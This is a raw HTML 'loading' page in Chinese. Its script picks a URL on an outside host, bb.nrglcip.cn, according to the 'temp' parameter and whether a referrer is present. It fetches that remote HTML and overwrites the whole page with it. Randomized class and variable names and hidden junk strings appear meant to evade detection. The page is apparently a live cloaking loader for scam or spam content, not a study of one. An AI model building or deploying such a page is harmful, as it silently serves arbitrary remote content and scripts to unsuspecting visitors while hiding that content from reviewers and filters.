<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qL8rLlnCJA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qL8rLlnCJA .JeFaj0BS {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qL8rLlnCJA .content {
            line-height: 50px;
            text-align: center
        }

        .qL8rLlnCJA .img {
            width: 100%
        }

        .qL8rLlnCJA .SuOwRql {
            text-align: center
        }

        .qL8rLlnCJA .SuOwRql span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qL8rLlnCJA .SuOwRql span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qL8rLlnCJA .SuOwRql span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qL8rLlnCJA .SuOwRql span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qL8rLlnCJA .SuOwRql span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qL8rLlnCJA .SuOwRql span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qL8rLlnCJA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RycVlPMYfMrh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JC5u3w = RycVlPMYfMrh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JC5u3w +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JC5u3w +".html?a=share";
		}
		
        tyWT509=url+"#"+new Date().getTime();
        tyWT509 && function() {
            $.get(tyWT509, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>jW9LUfMSrwirr7xnd9Es7V5TTTITM</div>
<li style='display:none' >a6Guqy9C8pfDwcE5</li>
<p  style='display:none'>GGSyRx7T0NMiI2BCfKDx2c9dWuiaBWZXUaHm</p>
<a  href='#' style='display:none'>AmMVKXaK5jo</a>
<div style='display:none'>jW9LUfMSrwirr7xnd9Es7V5TTTITM</div>
<p  style='display:none'>GGSyRx7T0NMiI2BCfKDx2c9dWuiaBWZXUaHm</p><div class="qL8rLlnCJA">
    <div class="JeFaj0BS">
        <div class="SuOwRql">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>GVdPrPhNHJ2z4AIgzt9cOQdhU9L30OvTVrCctAobMyrvvYWcqWrL8</div>
<span style='display:none'>niTPVJdIyPNkKdPXkFPINrveeaHFLzvd8IuUF61qdHjWWavzD</span>
<b style='display:none' >zQnNm5rItWJH08PgFWQE2uR8TMBCLJjqI4Fmepx0RsoD2tnDw1WaJr2YtE5dZbWDIkJYhQ3UkD8fvganA50InwcMvzxdhv9Wcc7</b></body>
</html>